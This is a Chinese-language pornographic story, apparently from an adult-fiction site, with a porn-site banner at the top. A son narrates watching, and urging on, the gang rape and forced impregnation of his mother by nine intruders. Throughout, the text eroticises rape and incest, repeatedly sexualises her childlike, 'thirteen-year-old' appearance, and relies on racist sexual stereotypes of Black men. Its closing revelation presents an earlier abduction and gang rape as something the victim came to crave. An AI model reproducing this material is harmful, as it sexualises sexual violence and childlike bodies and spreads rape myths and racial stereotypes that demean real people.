返回

妈妈的黑色群交f49

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我叫乐仔,22岁。我的妈妈叫凌莎莉,是个过气艳星,说穿了就是脱光光的脱星,80年代后期生下我就退休了,之后我到十岁,就离婚了,之后我们一起生活。妈妈今年都45岁了,但还是美丽如昔,她身高虽只有4尺10吋,但三围是32C,22,34,娇小玲珑,身材诱人,而且长得一幅娃娃脸,如果你看到她,你一定会以为她只有十三岁。

而她的个子虽小,身材却非常性感,就像是服装杂志封面女郎的缩小版,她有一头长发,又圆又紧的臀部,适中的胸部,鲜粉红色而且几乎美得发亮的乳头,当然她的腰也非常地细,她的体重只有86磅,你就知道她看起来多娇小,但是又多迷人了。

我由10多岁开始就把妈妈当成是性幻想的对像,为妈妈而打飞机无数次,我很想可以把这性感妈妈搅上手,妈妈也慢慢知道我的想法,妈妈没怪责我,也没让我成事,只是任由我偷看她,有时什至可以抚摸妈妈的身体。

虽然她的个子小,但是她的脾气却很容易冲动,而这一次,也就是因为她的脾气,改变了我们的一生。

事情是发生在星期五,我们记划了两个星期,要好好渡过那个周末,莎莉开车去买东西,当她要回家的时候,她抄近路开进一条巷子里,但是对面又有一辆卡车开过来,所以她开不过去,不消说,莎莉气得要命,而且那个卡车司机一幅鸟样,更让她气得要死,所以她对那个司机大声叫骂,最后惹火了那个司机,他下了车。

那司机是一个非常高大的黑人,而且莎莉发现卡车上还有其他人,但是她在气头上,也管不了那么多,那个司机走向莎莉,而莎莉还是咒骂个不停。

那司机走到莎莉车前,叫莎莉闭嘴,还说她年纪这么小,不应该开车,一定是无照驾驶,而且如果莎莉再骂的话,他就会用他的大宾周插到莎莉的屁股里。

而莎莉也不甘示弱,她告诉那个司机,虽然自己个子娇小,但是他的宾周可能还太小了,插进来一点感觉也没有!

这句话一说完,那司机显然气得要命,他快步往莎莉的车门接近,而卡车上的其他人也开始下车。

莎莉看苗头不对,她立刻打下倒档,加足油门离开现场,而她也看到那些黑人上了卡车在后面追她,她一直开了几条街,直到她跟在一辆警车后面,那部卡车才消失。

她回家之后打电话给我,告诉了我这件事,我早就一直告诉她要控制她的脾气,如果她早听我的,今天就不会惹这种麻烦。但是她认为这没什么大不了的,而且万一那些黑人抓到她,不知道会怎样对付她,她想到这里就觉得很好玩。

我告诉她,我可不认为这有什么好玩的,我不想她发生什么事情,我要她锁好门,等我回家后再说。

发生这件事的时候我们22岁生日,而妈妈也准备送我一份大礼,而且也是一个大惊喜。莎莉开始调整她的体质准备受孕,而且在我面前服用摧排卵药(也就是多仔丸)三个月了,每天都在量她的基础体温。

她两周前才告诉我,她的基础体温告诉她,这个周末是她受孕的最好日子,如果被精液射入子宫的话,她一定会怀孕,所以就在周末和我庆祝生日。她说她一想到这个周末就兴奋得要命,她从来没有这么兴奋过;而我也是,因为我想妈妈莎莉可能会让我干她,而且会直接让我把精液射入她的子宫,怀上我的孽种。

我是晚上七点左右回到家的,莎莉已经一丝不挂两腿张开地躺在床上,用一根黑色的假阳具自慰,她说她好饥渴,她一定要发泄一下,否则会发疯的。

我脱下我的衣服告诉她,有真的东西在这里,她用不着那个假的东西。

我的宾周已经硬得可以随时准备上场了,但是妈妈说她还不能让我上,因为时间还没到,一直要等到十点才行,因为那个时候才是最佳的受孕时间,要我好好地等待今晚的惊喜。她要我把我刚租的A片拿出来放,然后坐在床边,一边看她自慰,一边看日本AV,好让我们两人持续兴奋。

我照她的话做,这个情形真是太刺激了,我的宾周硬得不得了,好几次我差点要射精,但是她不断地提醒我不可以射精,否则她会发脾气的。她还一再向我保证,只要时间一到,射在她体内三次的话,那受孕率就是百分之百;而且她还说,我看着她自慰也让她兴奋得要命,而且那根假阳具是黑色的,她说这样好像是我看着一个黑人在和她性交。

事实上,看我妈妈看别人性交一直是我的梦想,不过我从来没有告诉过她,因为我怕她生气,也许她知道我的心意吧。我要看她和别人造爱,说只有妈妈从前的电影了。

接下来的两个半小时,我看着我妈妈用黑色的假阳具干她自己,高潮一个接一个接踵而来。而她看着A片中的女主角让别人干着她的阴道、嘴和肛门,片子中的男人不断射精在女主角的身上。

其中一个情节是成熟太太被四个黑人轮奸,而她的儿子在一旁看着那四个黑人如何利用他的妈妈,一个人干她的阴道、另一个插进她嘴里、第三个搞她的肛门,最后一个男人则是把他的宾周抵在女主角的脸上打飞机。

当我的妈妈看到这一段情节时,她开始加速假阳具的抽送速度,而且插得很深,高潮更激烈了。当一个高潮结束后,她说,如果今天卡车上的黑人抓到她的话,他们很可能也会这样对她。

我告诉她,她说的可能是对的。她听到这里抽送得更激烈了,而且马上又是一个高潮,我知道她一定在幻想卡车上的那群人正和她性交。接着她又说了一些话,我打死也不相信这些话会出自我那娇小的妈妈口中。

她说那些黑人的宾周一定比她现在用的按摩棒还要大、还要舒服。

我开玩笑地说,也许下一次她不要跑得那么快,那就可以尝到滋味了。

她也说,她下次或许不会再逃走了。她又问我,如果她和那些人做些什么事情,我会生气吗?

这时候我还能说什么?我该告诉她事实吗?我该告诉她,我也一直幻想她和其他人性交吗?或者我得告诉她,如果她和别人性交我会生气吗?

当时我兴奋得昏了头,所以我决定告诉她事实,然后看她的反应。

那时她还一直边用人工阴茎自慰,一边看着电视上的女主角被那四个黑人轮奸,听那女主角的儿子鼓励那些黑人把精液射进他妈妈体内。

我开始告诉她事实,我告诉她,我知道她和老爸结婚后就没试过其他男人的阴茎,如果只和的乱伦也不会够,而且妈妈又曾是脱星,如果我不准她和别人上床的话,这对她很不公平。我告诉她,我真的希望她可以和别的男人性交。

我甚至告诉她,如果有人把精液射进她体内,我会很乐意看到,而且不管她和多少人性交、性交的次数多频繁、用什么方式性交,我都不会生气。我说我认为这样会对我们的性生活有帮助。

我还告诉她,我常常在幻想其他人把他们的大阳具插进她娇小的胴体内,当我想到他们把精液射进去的时候,更是让我快乐。

听我说完后,她开始告诉我,她其实自离婚一直都想和别人性交,舔一舔别人的宾周,但是她一直不敢告诉我,怕我不高兴。她还说,她有多希望感觉他们的精液射进体内的感受,而且她更想试试被轮奸或者被不停地被强暴的滋味,如果轮奸她的是黑人,那感觉一定会更棒;而且,如果我能在一旁看她如何被别人蹂躏,那是她最大的心愿,她说那也是她为什么使用黑色按摩棒的原因。

我告诉她,我也很喜欢看到她被黑人折磨。经过我在一旁鼓励她的言语刺激下,她的高潮越来越强烈。最后我告诉她,如果她真的爱我的话,我会让黑人来和她性交,甚至强奸轮奸。

她听到这里,她的高潮到达顶点,她不停地颤抖而且大声呻吟,我从来没看见过妈妈这么激烈的高潮,就是理电影里也没有。她一边高潮,一边大声叫着,她多想被黑人的大宾周强奸,让他们射精在体内,而我在旁边看她被强奸。

我差点就要射精了,不过还好我忍住了,我们一边看A片,一边看莎莉用黑色的按摩棒自慰,等待十点的到来(现在是九点四十五分),我想知道除了可以得赏所愿干到妈妈外,还可以有什么惊喜。我一直保持勃起,而我妈妈躺在床上,不断地高潮,直到我身后传来一些声音。

我正想回头看看什么事情,但是立刻有几只黑色的大手抓住了我。我望向我妈妈,她正躺在床上,双腿张开,人工阴茎正插在阴道里,而且她还在高潮中,这时候她是无法停下来的。

我看着她,听到她大叫:“我的天哪!那辆货车上的人!”

我坐在地上,看到抓住我的是四个巨大的黑人,我这时候才知道莎莉没有甩掉他们,他们一直跟踪莎莉到了家里。

这时候又有五个大块头黑人走了进来,看着莎莉结束她的高潮。

我想要挣脱,但是没有用,他们实在太强壮了,我觉得无助。我看着我那和小女孩一样娇小的妈妈一丝不挂地躺在床上,我知道他们要做什么。

莎莉看着我,她的高潮已经结束了,但是按摩棒还插在她阴道里。看她的样子,她也了解那些黑人要做些什么。

其中一个黑人,我后来知道他就是那个司机,他告诉我们,他们九个人在房外的走廊已经站了一个小时了,早就知道我们母子所做的事情,他们最后决定进来,完成我们母子的心愿。他还说:“现在快十点了,你的妈妈不用担心精液不够。”

我的妈妈想用床单遮住身体,但是他们扯开了床单,并且握住她的腿,仔细地看她还插着按摩棒的阴道。

那个司机,他叫做Jim,他伸手握住了那根假阳具,开始在莎莉的阴道中抽送。他一边用那假阳具干莎莉,一边说道:“你这个花痴,你喜欢黑色的东西插你的烂穴对不对?”

莎莉看着我,知道再抵抗也是无益,于是她说道:“是,我喜欢。”

Jim的大手放在莎莉的整个阴部上,手上握着按摩捧不停地在她的阴道里进出,我看着莎莉开始痉孪,我知道她又高潮了。

这个时候,他们用我的领带绑住我,把我扔在床边的地板上,我动弹不得,但是可以看到他们要如何对待我的妈妈。

Jim道:“这个位置可以让你看到所有的精彩好戏。”

当Jim用按摩棒干莎莉时,其他的八个黑人开始脱衣服,他们脱下裤子后,我发誓,我从来没有看过这么大、这么黑的宾周。

我的妈妈看着那八根已经勃起的阴茎走向她,其中没有一根短于9吋,甚至连他们那么大的手掌,也不能完全握住他们的大宾周。

他们爬上了床,开始抚摸莎莉那娇小的身体,还把他们的大肉棒抵在莎莉的脸、乳房和嘴上。莎莉和这八个男人相比,简直是个玩具。

那八个男人忙碌地玩着我的妈妈,他们不停地吻她、吸她的乳房,还把他们的大宾周在莎莉的脸和身体上抹来抹去的。这个时候Jim才开始脱衣服,当他露出他的大宾周时,他的宾周早就因为刚才用人工阴茎玩我妈妈、和看他那八个朋友玩弄我妈妈的刺激而硬了起来。

他的宾周真是大得可怕,起码有14吋长,而且粗得不知该如何形容,简直就是巨人的阴茎。我看了真是自卑得要命,我甚至连看都没有勇气,但是却又让我异常地兴奋,因为我知道过不了多久,这巨大的东西将会插进我妈妈娇小的体内。

我望向我妈妈,看到她正目不转睛地盯着Jim的大宾周。

Jim走近莎莉,让她能再看清楚他的家伙,同时说道:“我想你们不用再担心精液不足了,不是吗?”

我看到莎莉全身又开始颤抖,我知道她又再一次高潮了,真没想到,她只不过看着这根大阳具就能得到高潮。毫无疑问地,她也知道她马上会尝到这根大肉棒插进体内的滋味,也更了解这个黑人将马上成为她孩子的父亲。

看着她高潮的样子,我似乎可以感觉到莎莉其实是想被这九个黑人玩弄的,而且她也愿意让这九个男人使她受精。

我的宾周越来越硬,由于我被绑着,所以我的宾周无从掩饰地朝着天花板勃起。Jim看着我勃起的宾周,转过头对莎莉说:“莎莉,你看你儿子的宾周,他知道我们要对你做什么,而且这让他很兴奋。”

莎莉看着我的宾周,她知道那些男人如果当着我的面轮奸她、让她怀孕,会让我兴奋。

接着Jim对我说:“你要我们干你这个淫荡的妈妈对不对?”

我无法掩饰我的想法,我所能做的,就是看着莎莉的双眼,回答:“是!我要你们好好轮奸她!”我一直凝视着莎莉的眼睛。

Jim又问我:“是不是确定要让我们使莎莉怀孕?”

再一次地,我深情地看着莎莉的双眼,坚定地说道:“是的,我要你们用你们的黑色大宾周插进她的身体里,当着我的面,用你们的精液让她怀孕。”

莎莉听到我这么说,不发出声音,只用她的嘴型说着“我爱你,谢谢你。”她才刚说完,一根黑色的大宾周就塞进她的口中。

Jim的宾周已经完全勃起了,看起来就像他的下体装了一根棒球棒一样,他已经准备好把他的大宾周插进莎莉的阴道里了;而看莎莉的神情,她似乎也准备好让Jim插她了。

Jim看着墙上的钟,说道:“十点了,是办事的时候了。”

当Jim突然把人工阴茎从莎莉的阴道中拔出来时,我听到不小的水声,也看到淫水从莎莉的阴道中流了出来。Jim接住那些淫水,将它抹在莎莉的整个阴道上。

那个把阴茎插进莎莉嘴里的家伙开始发出呻吟,我知道他将把他的精液射进莎莉的口中,莎莉一直尽力吸着口中的阴茎,似乎是想把那根阴茎中的所有精液都吸出来。当莎莉口中的阴茎再也吸不出精液后,我听到她发出呻吟,我想不到她居然连尝到精液都会高潮!!

当其他的人看到这个情形,一个家伙立刻射了一大股精液到莎莉的脸上,他根本还没有试过插入莎莉体内的感觉,就已经不行了,可想而知莎莉当时有多么淫荡!

那个放进莎莉口中的阴茎退了出来,莎莉抹着脸上的精液,直到她的手上都是精液,然后伸手握住Jim的大宾周,把手上的精液都抹在他的宾周上,让Jim知道她现在十分需要他的大家伙。

莎莉一边握住Jim的大宾周,同时一直不停地看着我,她把手上阴茎的龟头抵在自己的阴道上,不停地上下磨擦着她的阴道。

我不知道莎莉怎么能被这么大的阴茎干,因为她的手显然还握不到那根阴茎的四分之一。

莎莉一直凝视着我,我看着那根大宾周往前顶,莎莉的阴唇张开,龟头慢慢地插了进去。莎莉还是一直望着我,而且对我微笑。

我看着她的阴道越张越开,阴茎越插越深,直到她的阴唇变得几乎和纸一样薄时,我才看到Jim的龟头消失在莎莉的阴道中。

莎莉立刻达到一个强烈的高潮,就在另一根黑色阴茎插进她嘴里之前,我听到她告诉Jim不要担心这么大的宾周会伤害她,她要Jim完全插入,让她好好感觉他的大宾周;然后她又大声地对Jim说,她好想试试Jim射精在体内的感觉。

这句话的音量足以让房里的每个人都听得到,莎莉又看着我,对我说她要我看着她和黑人性交,让她怀孕。

Jim听到她这么说,他转过头来,要我靠近一点看,看清楚他是如何把他的大阳具插进我娇小妈妈的体内,看他的精液射进我妈妈的体内,让她怀孕。

Jim把他的大宾周一直往莎莉的阴道抽插,直到莎莉痛苦地张嘴大叫,可是她的嘴一张开,另一根黑色的粗大阴茎就插进了他的口中,而且开始快速在莎莉口中抽送。莎莉的口中虽然含着宾周,但是还是可以听到她痛苦的尖叫声。

当莎莉尖叫时,Jim会把他的阴茎拔出来大约两吋,然后再狠狠地插入,插得更深,直到莎莉再度尖叫为止。

看着一班黑人强奸我妈妈,让我兴奋得要命,我这辈子从来没有这么兴奋过。

Jim持续地把阴茎拔出一些,再用力插入,直到他的阴囊碰到莎莉的屁股为止。而这个时候,把宾周插进莎莉嘴里的家伙也开始射精,精液不但射进莎莉嘴里,还射到她的脸和头发上,甚至连乳房上也有。

她满脸精液看着我,全身不停颤抖,进入了仿佛是无止境的高潮。

高潮稍歇,莎莉要我仔细看那根巨大的宾周在她的阴道里抽送的样子,因为她要我确定看到那根黑色大宾周全插进她体内的样子。

她告诉我,Jim干她的时候是如何的舒服。我要先去习惯黑人和她性交的样子,因为从现在开始,在场的所有黑人都会开始轮奸她。

Jim干她的速度越来越快,也越来越用力,他几乎是把他的阴茎全部都拉出来,再狠狠地一次插到底。每一次他把他的大肉棒插入我妈妈只有儿童般大小的胴体中时,我看到莎莉的肚子随着插入的深度而凸起,我知道Jim的龟头一定已经插到莎莉胃部的位置,把她的胃往上挤。

莎莉紧紧地抱着那个干她的男人,深深地吻他,把舌头探入Jim的口中。我听到她要求Jim射精在她的体内,她告诉Jim,她的子宫需要精液的灌溉,她知道如果Jim射精在她的体内会发生什么事,她已经下定决心要怀一个黑人小孩。

而我被领带绑在一旁,动也不能动,所有的人都看到我的龟头指着天花板。我的耳中听着我最爱的妈妈哀求一个大个子黑人干她、让她怀孕,另外八个黑人轮流干她的嘴,把他们的精液射在她的脸上和乳房上,等着上我妈妈。

接着,干莎莉嘴的那个男人全身开始抽搐,很明显地,他快要射精了,莎莉也开始疯狂地吸吮,另外两个男人把他们的龟头抵在莎莉如同儿童般的脸上打飞机。那个把宾周插在莎莉口中的男人,把下腹往前一顶,将他12吋左右长的阴茎一次全插进莎莉口中,一直插进她的喉咙里,然后开始不停地呻吟,莎莉也到达了高潮,含着阴茎发出呻吟。

我知道他已经射精了,射进莎莉的食道中,一直流进她的胃里。

我兴奋地大叫,要莎莉把精液全吃进去,要她只要看到男人的精液,就把它们全吞进肚子里。我还一直告诉她,我是多么喜欢看到她的口中装满黑人们的精液。

当那个男人射精结束,他才从莎莉口中抽出他的阴茎,他的龟头才拔出来,立刻有一滴精液滴在莎莉的脸上,莎莉立刻伸手抓住那根阳具。此时,另外两个打飞机的男人也射精了,射得莎莉满脸都是精液,莎莉把手上的阴茎往脸上抹,当手上的阴茎都沾满精液后,莎莉再将那根肉棒放入口中,接着把阴茎上沾的精液吸干净。

她把阴茎上沾的精液都吸入口中后,取出阳具,同时向我比了个手势,要我看她的口内,她一张开嘴,我看到她的嘴里满满的都是精液。莎莉把口中的精液咽下去后对我说,她很喜欢口中有不同男人精液的感觉,她所望所有的男人都能同时射精在她嘴里。

我告诉她,我也很想看到这个情形,不管他们对她做什么,我都乐意看到。

这个时候,Jim干莎莉干得越来越凶猛了,我和莎莉都知道,他就快要射精了。也就是说,莎莉马上就要怀孕了!

其实莎莉的高潮已经一直持续了半个小时以上,高潮从Jim的龟头一接触到她的阴唇就开始了。其他的男人一直在讥笑她,因为莎莉一直在求Jim射精在她体内。

莎莉的一边看着我,一边告诉Jim,如果他射精在她体内的话,她愿意为Jim做任何事,要她在任何地方、任何时间和任何人性交都行!她告诉Jim,她要做他的奴隶,绝对遵守他的命令,为他做妓女也可以!不管他要怎么玩她,她都绝对不会反抗!

听到这些话,我吓了一大跳,我虽然不相信这些话会出自我妈妈的口中,但是我却兴奋得要命!

Jim回答莎莉,他会干她的肛门,还要在公共场所干她,让路人们看着她被干;他还要把莎莉交给他的一些黑人朋友,让他们任意玩弄她;还要带她去参加黑人的聚会,安排一大群男人现场和她表演性交。

Jim问莎莉,听清楚他所说的话了吗?

莎莉在Jim对她说话时一直望着我,她回答Jim她完全了解Jim的意思,她也会完全服从Jim,只要Jim射精在她的子宫里。

Jim还是一边狠狠地干着莎莉,一边转过头来问我,懂不懂他们刚才说的是什么?我是不是也同意他们的约定?Jim还说,我必需要保证莎莉会按照约定去做,如果莎莉不做的话,我一定要协助强迫莎莉完遵照协定。

这个时候,莎莉注视着我,告诉我,如果我真的爱她,也重视她的性生活的话,我就该毫不犹豫地同意Jim的要求。她说她真的很想成为黑人的奴隶,但是她有时候可能会抗拒,她要我帮她成为一个黑人的性奴隶。

所有的人都看着我,等待我的回答,我看着Jim巨大的宾周在莎莉小小的阴道中快速抽送,我阻止不了心中一阵阵强烈的快感袭来。

我的脑海中出现了一幅景像:一大群的黑人围着我那娇美的妈妈,他们抓住我那只有儿童般个头的妈妈,像干条母狗般地轮奸她,我达到了一个强烈的、几近痛苦的高潮,我的精液向空中激射而出。因为我被绑着,我的高潮无所隐藏,我持续不停地射精,我从来不知道我一次可以射出这么大的量,精液射上了床,射到了Jim和莎莉身上,房内的人捧腹大笑。

莎莉笑着对我说:“我想,我知道你的答案了。Jim,我的儿子回答得很清楚,他要我做你的奴隶,他完全了解会发生什么事情,特别是今晚,如果你射精进来,他知道我将会怀一个黑人宝宝!”

Jim下腹往前一顶,把他的大宾周一次插进莎莉的小穴里,接着开始抽搐。莎莉深情地看着我,对着我微笑,我却觉得那个神情带着轻蔑。当Jim开始射精时,她还是一直微笑看着我,不过她开始对我说,她可以感觉到Jim射精在她子宫里,他的精液好烫、好舒服,而且她几乎也可以感觉到她受精了。

她的高潮一直没有中断,她呻吟地告诉我,她希望日夜不停地有精液注入她的子宫,接着她要我仔细看她的阴道。

我看到Jim的宾周上沾满了精液,还不停地在莎莉的小穴内抽送。

莎莉再一次用那带着轻蔑的神情看着我,对我微笑,用每个人都听得到的声音说道:“你知道他现在在做什么吗?他正在让我受精,我可以感觉到我已经怀孕了,你正看着你的妈妈让一个黑人受孕。将来孩子出生,每个人都知道你的妈妈和黑人打炮,你喜欢这样吗?等一下Jim干完我后,还有其他的黑人等着干你已经有身孕的妈妈,你喜欢看到这个情景吗?”

莎莉一直不停地和我说话,也不停地用话来羞辱我,像是她说和黑人性交很爽、我的宾周从来没有让她这么舒服过、她宁愿让黑人使她怀孕也不愿让我插,她愿意让黑人每天干她。

“你喜欢我每天被黑人搞吗?看黑人奸淫我会让你感到兴奋吗?”她接着问我。

我兴奋得说不出话,也自然给不了她答案,我又再一次地射精,喷到了她和Jim身上。

莎莉看到我射精,她告诉我,我射精表示我爱她,而如果我要更爱她的话,那么以后就要强迫她成为这些黑人的性奴隶,让她一而再、再而三的被别的男人轮奸,看她和上百个陌生男人性交。但是最重要的,就是让她一而再、再而三地安排黑人使她怀孕。

Jim抽送的速度慢了下来,而开始将他的阴茎由莎莉的阴道中退出来,在他拔出阴茎的时候,我的妈妈求他不要拔出来,要Jim继续搞她。但是Jim说其他人还等着干她,他们还有更多的精液。

当Jim把他的阴茎由莎莉的阴道中抽出来时,他的精液也从莎莉的阴道中涌出来,我发现莎莉的阴道还没有合起来,我可以直接看到她的体内,我看到莎莉的阴道里还满满的都是精液,这让我又兴奋起来。这么大的宾周把她的阴道撑开到了极限,我妈妈原来像孩子般紧紧的阴道从此可能不会再那么紧了,她的阴道张开,等着其他八个等待着的黑人使用。

接下来,一个黑人爬到莎莉张开的双腿之间,然后把他的阴茎插入莎莉早已满是精液的阴道里,开始接手干莎莉。Jim则到莎莉的面前,把他已经软化了的宾周在莎莉尽是精液的脸上抹来抹去,莎莉很快地张开嘴,Jim就把他的宾周放了进去,莎莉开始吸吮,还把Jim的宾周从头到尾舔了一遍,双手握住Jim的肉棒不停地上下搓弄。还一边告诉Jim,他的精液是多么的好吃,一边被别人干、一边吸他的宾周是多么的爽,特别是我被绑在一边看着她。

Jim又开始硬了,不止是他,我们其他每一个人都一样。

Jim告诉莎莉,他会以对待一个妓女的方式对待她,他将会找几千个黑人来奸淫她。接着他告诉莎莉,他要射精在她的口中和脸上,他说他这次射精之后,他要莎莉再把他的宾周用嘴弄硬,然后他去干她的肛门,等他干过她的肛门后,其他的人才会跟着搞她的后门。

莎莉的肛门还没有开发过,不过很明显地,她很愿意让他们先来试试她的肛门。

我看到我的妈妈愿意把她第一次肛交交给这些男人,更是让我兴奋,我也知道从今夜开始,她的肛门将会一再地让粗大的黑宾周插进去。

我无意识地发出呻吟:“对……干她!把她肛门的处女夺走!”

其中一个家伙听到我说的话,笑着问我:“莎莉的肛门是不是真的没有让人搞过?”

我回答:“没错,她的肛门从没被插过,但是我可不想这样,我要你们在的面前,粗暴地夺走她肛门的处女,我要你们当着我的面,用你们的大宾周夺走她肛门的处女,快!快把你们的大宾周全部插进她肛门里,快!把你们的精液射进她的肛门里!”

我已经兴奋得语无伦次了。

我要莎莉知道我要他们干她的肛门,我要她的嘴里、阴道里、肛门里都塞进黑色的大宾周。

她阴道里淌出来的精液早已流到她的肛门上,那个刚才问我话的黑人一边对我笑,一边把他的龟头抵在莎莉的肛门上。

我可以听见莎莉口中含着Jim的阴茎开始发出呻吟,而那个黑人也开始把他的龟头往莎莉的肛门里塞,当他的龟头消失在莎莉的肛门里时,莎莉达到了另一波强烈的高潮。现在她身上所有能插的肉洞,都已经插着一根黑色的大宾周。

她的高潮也给所有干她的人带来连锁反应,那个干她阴道的家伙开始射精在她体内,另外两个在她脸旁打飞机的也同时射精,精液喷上莎莉的脸和头发,Jim还是狠狠地干着她的嘴。莎莉抓住那两个刚射精在她脸上的肉棒,不停地上下搓弄,确定阴茎不再有任何没射完的精液,已经全部射在她脸上了。

接着我发现莎莉为什么对Jim的精液那么需求的原因,因为Jim开始射精在莎莉的嘴里,Jim把他的宾周拉出来,对着莎莉张开的嘴射精。我几乎不敢相信我的眼睛,Jim射精时并不像一般的男人,他的精液很多,而且持续喷出,就像是他把精液“尿”在莎莉嘴里。

Jim的精液注满莎莉的口中后,再把精液“尿”在莎莉的脸上,再顺着莎莉的脖子,一直“尿”到莎莉的乳房上。

我听到莎莉说道:“你的精液好热,我好喜欢你那热热的精液,我每天都想要被你们摧残。”

我知道她话中的意思,我又再一次控制不住,当我看到Jim由莎莉的乳房顺着她的脖子,将精液“尿”回她的脸上时,我再一次将精液射向空中。

我已经彻底精疲力尽了,接下来的三个小时,我看着那九个黑人一次又一次奸淫我美丽性感的妈妈。他们干莎莉的阴道、肛门、嘴,甚至还要莎莉乳交,只要能在我妈妈娇小身体上得到发泄的地方,他们都不放过。

当另外八个黑人都搞过莎莉的肛门,并且把精液射进她的直肠里后,我看见Jim才提起他的大宾周,打算插莎莉的肛门。

他的宾周那么人,我怕他会伤了莎莉,但是莎莉却没有反抗,而我也阻止不了Jim,事实上,我也阻止不了任何人想怎么玩莎莉。Jim还是把他的大宾周干进莎莉的肛门里,只是没插多久,Jim大声地发出呻吟,我知道,他又要射进一大股精液进莎莉的肛门中了。

这个时候,他们好像玩够了我妈妈,有的人坐下来抽烟,有的人把他们的阴茎放在莎莉的脸和乳房上磨擦。

我心里只希望,他们休息一会儿后,能再度勃起。

他们和莎莉说话,说他们会常常来干她,而且他们会把她当成妓女一样,把她扔给他们的朋友玩。

这正是我所希望的,我真不敢相信,这真是我心底的渴望。

当Jim说时间太晚了,他们要走的时候,我真是失望透了。不过Jim看出我失望的样子,他答应我在他们离开之前,再让我看一次表演。

Jim爬到莎莉的双腿之间,再一次把他的大宾周全插进莎莉的阴道里,他说他要再次确定莎莉子宫里的精液够多了。

我听了禁不住大笑,因为当他把他的大宾周插进莎莉阴道的时候,莎莉阴道里的精液几乎是用喷的流出来。莎莉现在体内的精液,起码足够让一百个女人怀孕。

当Jim今夜最后一次干莎莉的时候,其余八个黑人围在莎莉的面前打飞机,他们还一边用最下流的话来评论莎莉,完全把她当成一个下贱的荡妇。我从来没有听过有任何一个女人被人家说得这么难听。

但是这些话却让莎莉兴奋,也让Jim兴奋,Jim没多久就发出低吼,射精在莎莉体内。也几乎是同时,那围着莎莉打飞机的男人们也开始射精,他们的精液洒在莎莉的脸、头发、耳孔、眼睛、乳房,莎莉张开嘴,男人们找到了射精的目标,于是由四面八面男人们射出来的精液,都喷进了她的口中。

这个情形真是好看,莎莉的胴体因为精液而全身发出光泽,她的口中有好几股精液不停地注入。

当所有的男人都射完精,莎莉支起她的上半身,让我看她嘴里的精液,然后对我眨眨眼,将那满嘴的精液吞了进去。

那九个黑人穿好衣服,把我解开,并且告诉我,我最好现在上床做他们刚对莎莉做过的事。Jim说,既然我已经开始喜欢看我的妈妈被轮奸,下次他们来奸淫莎莉的时候就不用绑住我了。

我告诉他不用担心,我们已经达成了协定,我保证我一定会要我的妈妈遵守约定。我告诉他们,将来如果莎莉不遵守约定,我一定会帮他们强迫莎莉做他们要她做的事,而如果我不帮他们,或是我阻止他们享用我妈妈,他们可以尽管把我绑起来,再当着我的面任意奸淫莎莉。

我告诉他们,我真的很喜欢看他们今夜轮奸莎莉的样子,而且莎莉看起来也很喜欢他们这样搞她。

我用足以让莎莉听得一清二楚的音量,要求这些男人常常来和莎莉性交,也欢迎他们下次来的时候带他们的朋友一起来,越多越好。

接着他们鱼贯地走出房间,Jim最后一个出门,他出门的时候回过头来,向莎莉眨了眨眼,说道:“你说得果然没错。”

当他们离开我家的之后,我立刻爬上床,莎莉立刻用她满是精液的胴体抱住我。她虽然才刚刚性交过这么多次,而且身体内至少注入了4、50股男人的精液,但是她现在的情形显然还想要更多,她今夜到现在还不满足,如果世界上有绝对饥渴的女人,那一定是我的妈妈,至少今夜是她。

莎莉把我的手拉到她的小腹,要我摸摸她的阴道,然后她深深地吻我,我尝到她的口中还有精液的味道。我把手指插进她的阴道和肛门里,我发现里面全是精液。

她顽皮地问我,喜不喜欢摸到她身体里面有其他男人精液的感觉?又问我喜不喜欢她口中男人精液的味道?

我没有回答,她早就知道我的答案,所以她就接着说她是多么喜欢同时被这么多男人干,尤其我还在一旁看着他们玩她。她喜欢大宾周插进阴道里的感觉,今夜被那么大的宾周搞过之后,她对一般大小的阴茎再也不会感到满足,就连我的阳具也一样!

我的宾周只有一般男人的大小,很明显地,从今晚开始,我的宾周再也没办法满足她了,如果我真的爱她,要满足她的性需求,我将来一定得常常安排一些有大宾周的黑人来轮奸她。

她还一直说,除了让一群大宾周的黑人轮奸她之外,没有什么方式可以满足她,她喜欢子宫里装满精液的感觉,也知道我喜欢看她被轮奸,或许她被轮奸的时候,我比她还快乐。

莎莉还一直说一些故意羞辱我的话,她说他们任何一个人干她,比我干她还要舒服。她还说,他们干她干得这么舒服,所以她宁愿被他们轮奸成孕,也不会被我干,乱伦可是我自己的性幻想吧了。

她最后说,以我的宾周大小,唯一可能可以满足她的方式,就是在一大群男人干完她之后我再搞她,或许还有机会。

忽然我的好奇心发作,我问莎莉,Jim走的时候说的那句话是什么意思?

莎莉沉默了一会儿,然后自言自语地低声道:“我就知道那个混蛋守不住秘密。”

我问她这句话是什么意思。

她又再度沉默。

过了好一会儿,她才道:“我知道你迟早会发现的,我会告诉你事实,但是在我告诉你真相之前,你要保证你不生气。有些事情不是我的错,也不是我所能控制的。”

我告诉莎莉马上告诉我事实,否则我就要生气了。

莎莉开始告诉我整个故事,这件事早就发生了,而我一点也不知道。不过她一说,我才发现妈妈在这三个月的生活果然有些异样。

她说她今天在电话里告诉我货车的事件是真的,但是这件事是发生在三个月前,她说她一想起这件事,还会感到兴奋。她说,她告诉我的故事都是真的,只是那天她没有逃出那条巷子,他们抓住了她,并且把她拖出车外,莎莉拼命地挣扎,但是他们把她?起来扔进货车的后车厢,车厢里还有另外四个黑人,都不是今天来我家的黑人。莎莉在后车厢被他们五个黑人一直重覆强奸,他们一共轮奸了她四个多小时。莎莉说她已经尽全力抵抗与尖叫,但是还是阻止不了他们。

我问莎莉,她为什么不告诉我她被强奸了,或者为什么不去报警。

她说她曾经有这么想过,但是当她被第一个黑人强奸过后,她爱上了这种感觉,所以他们干她时,她也有了反应,她知道她一有反应,这些黑人会发现她喜欢性交。她虽然有抗拒,但是她的反应实在让这场性交称不上是强奸,而且他们还拿出摄影机拍下他们性交的画面,画面里也一定拍下了她那幅沉醉的表情。特别是Jim,他不但干她,还射精在她体内。

她说之后两个星期,她还被Jim和他的朋友轮奸了她四次,每一次她被强奸之后,她就更喜欢被强奸的感觉。Jim每一次都会找不同的黑人来轮奸她,而且人数一次比一次多,莎莉也越来越沉迷在被黑人轮奸的快感里。

妈妈第四次被强暴的时候,强暴她的黑人多达十七人。她在被强暴之后,才向Jim承认她喜欢被黑人轮暴,她希望常常被人轮暴,更喜欢Jim他那超大的宾周。

